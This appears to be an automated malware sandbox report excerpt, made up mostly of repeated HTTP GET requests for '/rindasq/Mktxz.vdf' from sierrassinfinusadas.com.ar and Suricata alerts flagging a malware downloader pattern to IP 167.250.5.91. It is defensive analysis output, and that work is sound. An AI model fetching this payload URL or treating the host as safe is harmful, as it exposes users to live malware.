                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: Joe Sandbox ViewIP Address: 167.250.5.91 167.250.5.91
                    Source: Joe Sandbox ViewASN Name: AS-COLOAMUS AS-COLOAMUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49742 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49794 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49751 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49788 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49757 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49769 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49774 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49813 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49763 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49847 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49840 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49834 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49827 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49854 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49919 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49782 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49821 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49861 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49801 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49958 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49944 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49893 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49868 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49879 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50016 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49886 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49806 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49950 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50058 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50010 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50045 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50091 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50072 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49977 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50093 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50125 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50039 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50051 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50131 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50137 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50180 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50129 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49932 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50004 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50179 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50095 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50173 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50123 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50154 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49971 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50156 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50139 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49906 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50109 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49873 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49964 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50158 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50118 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50103 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50135 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50127 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50175 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49937 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50100 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50107 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50033 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50145 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49985 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50114 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50105 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50068 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49997 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50182 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49901 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50162 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50112 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50083 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50075 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49912 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50027 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50133 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50141 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50085 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50177 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50081 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50147 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49925 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50064 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50149 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49992 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50070 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50077 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50151 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50171 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50089 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50121 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50143 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50166 -> 167.250.5.91:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50183 -> 167.250.5.91:443
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.arConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.arConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
